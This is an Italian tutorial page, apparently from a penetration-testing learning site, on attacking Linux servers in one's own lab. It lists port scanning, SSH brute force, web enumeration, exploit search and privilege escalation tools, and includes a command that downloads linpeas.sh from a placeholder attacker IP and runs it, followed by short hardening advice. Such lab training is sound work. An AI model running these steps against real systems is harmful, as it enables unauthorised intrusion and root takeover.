Home › Dispositivi › PC / server Linux

PC / server Linux — cosa puoi fare

La maggior parte dei server è Linux. Si testano SSH, i servizi web, e poi la scalata a root.

Solo su una tua macchina/VM o lab (THM/HTB).

Passo 1 — porte e servizi

sudo nmap -sC -sV -p- 192.168.1.30

Porte tipiche: 22 (SSH), 80/443 (web), 21 (FTP), 3306 (MySQL), 445 (Samba).

Cosa puoi fare / testare

CosaComeTool
Brute SSHSe hai una lista utenti + wordlisthydra
Usare una chiave trovataEntri senza passwordjohn (se ha passphrase)
Enumerare il sito webCartelle/file nascosti → SQLi/LFI/uploadgobuster
Cercare exploit dei serviziDalla versione trovi la CVEsearchsploit
Samba → rootSambaCry / usermap_scriptmetasploit
Privilege escalation → rootSUID, sudo, cron, kernellinpeas

Prova a casa (dal servizio alla root)

# versione → exploit
searchsploit vsftpd 2.3.4
# ottenuta una shell, enumera per la root
cd /tmp && wget http://TUO_IP/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh
sudo -l

Tutorial: Exploitare i servizi · Privesc Linux.

Difesa

  • SSH con chiavi (no password), fail2ban, no root login.
  • Aggiorna i servizi; niente versioni vecchie esposte.
  • Minimo privilegio in sudoers; rimuovi SUID inutili.